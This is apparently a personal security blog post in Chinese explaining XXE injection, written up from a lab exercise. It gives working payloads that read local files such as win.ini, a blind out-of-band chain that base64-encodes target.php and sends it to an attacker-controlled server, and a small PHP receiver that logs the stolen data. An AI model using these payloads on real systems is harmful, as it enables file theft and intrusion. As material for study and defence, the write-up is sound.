<!DOCTYPE html><html lang="en"><head><meta name="generator" content="Hexo 3.9.0"><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black-translucent" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="description"><link rel="stylesheet" type="text/css" href="//fonts.loli.net/css?family=Source+Code+Pro"><link rel="stylesheet" type="text/css" href="/css/style.css?v=2.0.4"><link rel="stylesheet" type="text/css" href="/css/highlight.css?v=2.0.4"><link rel="Shortcut Icon" href="/favicon.ico"><link rel="bookmark" href="/favicon.ico"><link rel="apple-touch-icon" href="/apple-touch-icon.png"><link rel="apple-touch-icon-precomposed" href="/apple-touch-icon.png"><title>XXE实体注入 | Hexo</title></head><body><div class="body_container"><div id="header"><div class="site-name"><h1 class="hidden">XXE实体注入</h1><a id="logo" href="/.">Hexo</a><p class="description"></p></div><div id="nav-menu"><a href="/." class="current"><i class="fa fa-home"> Home</i></a><a href="/archives/"><i class="fa fa-archive"> Archive</i></a><a href="/about/"><i class="fa fa-user"> About</i></a><a href="/atom.xml"><i class="fa fa-rss"> RSS</i></a></div><div id="search-form"><div id="result-mask" class="hide"></div><label><input id="search-key" type="text" autocomplete="off" placeholder="search"></label><div id="result-wrap" class="hide"><div id="search-result"></div></div><div class="hide"><template id="search-tpl"><div class="item"><a href="/{path}" title="{title}"><div class="title">{title}</div><div class="time">{date}</div><div class="tags">{tags}</div></a></div></template></div></div></div><div id="layout" class="layout-g"><div class="layout-l"><div class="content_container"><div class="post"><h1 class="post-title">XXE实体注入</h1><div class="post-meta"><a href="/2019/10/23/XXE实体注入/#comments" class="comment-count"></a><p><span class="date">Oct 23, 2019</span><span><i id="busuanzi_container_page_pv"><i id="busuanzi_value_page_pv"></i><i>Hits</i></i></span></p></div><div class="post-content"><p><strong>XXE注入定义：</strong> </p>
<p>XXE注入，即XML External Entity，XML外部实体注入。通过 XML 实体，”SYSTEM”关键词导致 XML 解析器可以从本地文件或者远程 URI 中读取数据。所以攻击者可以通过 XML 实体传递自己构造的恶意值，是处理程序解析它。当引用外部实体时，通过构造恶意内容，可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。</p>
<p><strong>XXE漏洞原理：</strong></p>
<p>既然XML可以从外部读取DTD文件，那我们就自然地想到了如果将路径换成另一个文件的路径，那么服务器在解析这个XML的时候就会把那个文件的内容赋值给SYSTEM前面的根元素中，只要我们在XML中让前面的根元素的内容显示出来，不就可以读取那个文件的内容了。这就造成了一个任意文件读取的漏洞。</p>
<p><strong>DTD引用方式：</strong></p>
<p>DTD内部声明 <!DOCTYPE 根元素[元素声明]><br>DTD外部引用 <!DOCTYPE 根元素名称 SYSTEM "外部DTD的URL"><br>引用公共DTD <!DOCTYPE 根元素名称 PUBLIC "DTD标识名""公用DTD的URL"></p>
<p><strong><em>列：</em></strong><br>DTD内部声明 <!DOCTYPE 根元素[元素声明]><br>DTD外部引用 <!DOCTYPE 根元素名称 SYSTEM “外部DTD的URL”><br>引用公共DTD <!DOCTYPE 根元素名称 PUBLIC “DTD标识名””公用DTD的URL”></p>
<p><strong>DTD实体声明：</strong></p>
<p>内部实体声明 <!ENTITY 实体名称 “实体的值”><br>一个实体由三个部分构成，分别是&amp;、实体名称、（；），这里&amp;不论在GET还是在POST中都需要进行URL编码，因为是使用参数传入XML的，&amp;符号会被认为是参数间的连接符号。</p>
<p><strong><em>外部实体声明:</em></strong><br><!ENTITY 实体名称 SYSTEM “URL/URI”><br>外部引用可支持http，file等协议，不同的语言支持的协议不同，但存在一些通用的协议。</p>
<p><strong><em>使用DTD的利用方式：</em></strong><br>利用XXE漏洞可以进行拒绝服务攻击、文件读取、命令代码执行、SQL（XSS）注入、内外扫描端口和入侵内网站点等，内网探测和入侵是利用XXE中支持的协议进行内网主机和端口的发现，可以理解为使用XXE进行SSRF的利用<br>一般XXE的利用分为两个场景：有回显和无回显。<br>有回显的情况下可以直接在页面看到Payload的执行结果或现象，无回显的情况又称为Blind XXE，可以使用外带数据通道提取数据</p>
<p>有回显：<br>可使用如下两种方式进行XXE注入攻击<br>    1.<!DOCTYPE foo [<!ELEMENT foo ANY ><br>    2.<!ENTITY xxe SYSTEM “file:///c:/windows/win.ini” >]&gt;<br>    3.&xxe;</p>
<pre><code>1.&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY &gt;
2.&lt;!ENTITY % xxe SYSTEM “http://xxx.xxx.xxx/evil.dtd&quot; &gt;
3.%xxe;]&gt;
4.&amp;evil;
外部evil.dtd中的内容：
&lt;!ENTITY evil SYSTEM “file:///c:/windows/win.ini” &gt;</code></pre><p>无回显：<br>可以使用外带数据通道提取数据，先使用php://filter获取目标文件的内容，然后将内容以http请求发送到接受数据的服务器（攻击服务器）xxx.xxx.xxx</p>
<pre><code>1.&lt;!DOCTYPE updateProfile [
2.&lt;!ENTITY % file SYSTEM “php://filter/read=convert.base64-encode/resource=./target.php”&gt;
3.&lt;!ENTITY % dtd SYSTEM “http://xxx.xxx.xxx/evil.dtd&quot;&gt;
4.%dtd;
5.%send;
6.]&gt;
evil.dtd的内容，内部的%号要进行实体编码成&amp;#x25。</code></pre><p>靶场:<img src="https://s2.ax1x.com/2019/11/03/KObum8.png" alt="KObum8.png"><br>源码：avatarsimplexml_load_string() 函数是把 XML 字符串载入对象中。抓包，把传参改为POST，avatar</p>
<pre><code>1.xml 为：
&lt;!ENTITY % all
&quot;&lt;!ENTITY &amp;#x25; send SYSTEM &apos;http://1.1.1.1:8888/2.php?id=%file;&apos;&gt;&quot;
 &gt;
 %all;
2.ph为：
&lt;?php file_put_contents(&quot;3.txt&quot;,$_GET[&apos;id&apos;],FILE_APPEND);?&gt;</code></pre><p>最后访问我们的接受服务器，再把得到的数据base64解码就ok了。</p>
</div><div class="post-copyright"><blockquote><p>Original author: KING</p><p>Original link: <a href="http://yoursite.com/2019/10/23/XXE实体注入/">http://yoursite.com/2019/10/23/XXE实体注入/</a></p><p>Copyright Notice: Please indicate the source of the reprint (must retain the author's signature and link)</p></blockquote></div><div class="tags"></div><div class="post-share"><div class="social-share"><span>Share:</span></div></div><div class="post-nav"><a href="/2019/10/23/SSRF/" class="pre">SSRF</a><a href="/2019/10/19/CSRF/" class="next">CSRF</a></div><div id="comments"></div></div></div></div><div class="layout-r"><div id="sidebar"><div class="search-pla"></div><div id="toc" class="widget"><div class="widget-title"><i class="fa fa-fei">Contents</i></div></div><div class="widget"><div class="widget-title"><i class="fa fa-xie"> Recent</i></div><ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2019/10/25/Access偏移注入/">Access偏移注入</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/23/SSRF/">SSRF</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/23/XXE实体注入/">XXE实体注入</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/19/CSRF/">CSRF</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/19/文件上传漏洞三/">文件上传漏洞三</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/18/DOM Based XSSDOM/">DOM Based XSSDOM</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/18/文件上传漏洞二/">文件上传漏洞二</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/17/盲注/">盲注</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/17/文件上传漏洞一/">文件上传漏洞一</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/17/宽字节注入/">宽字节注入</a></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-biao"> Tags</i></div><div class="tagcloud"></div></div><div class="widget"><div class="widget-title"><i class="fa fa-archive"> Archive</i></div><ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/10/">October 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/09/">September 2019</a></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-you"> Blogroll</i></div><ul></ul><a href="http://www.example1.com/" title="site-name1" target="_blank">site-name1</a><ul></ul><a href="http://www.example2.com/" title="site-name2" target="_blank">site-name2</a><ul></ul><a href="http://www.example3.com/" title="site-name3" target="_blank">site-name3</a></div></div></div></div><a id="totop" href="#top"></a><div id="footer"><div class="footer-info"><p><a href="/baidusitemap.xml">Site Map</a> |  <a href="/atom.xml">Subscribe to this site</a> |  <a href="/about/">Contact the blogger</a></p><p>本站总访问量：<i id="busuanzi_container_site_pv"><i id="busuanzi_value_site_pv"></i></i>次，本站总访客数:<i id="busuanzi_container_site_uv"><i id="busuanzi_value_site_uv"></i></i>人</p><p><span> Copyright &copy;<a href="/." rel="nofollow">KING.</a></span><span> Theme by<a rel="nofollow" target="_blank" href="https://github.com/chaooo/hexo-theme-BlueLake"> BlueLake.</a></span><span> Count by<a href="http://busuanzi.ibruce.info/"> busuanzi.</a></span><span> Powered by<a rel="nofollow" target="_blank" href="https://hexo.io"> Hexo.</a></span></p></div></div></div><script src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" async></script><script type="text/javascript" src="/js/search.json.js?v=2.0.4"></script><script type="text/javascript" src="/js/toctotop.js?v=2.0.4" async></script><link rel="stylesheet" type="text/css" href="/share/css/share.css"><script type="text/javascript" src="/share/js/social-share.js" charset="utf-8"></script><script type="text/javascript" src="/share/js/qrcode.js" charset="utf-8"></script></body></html>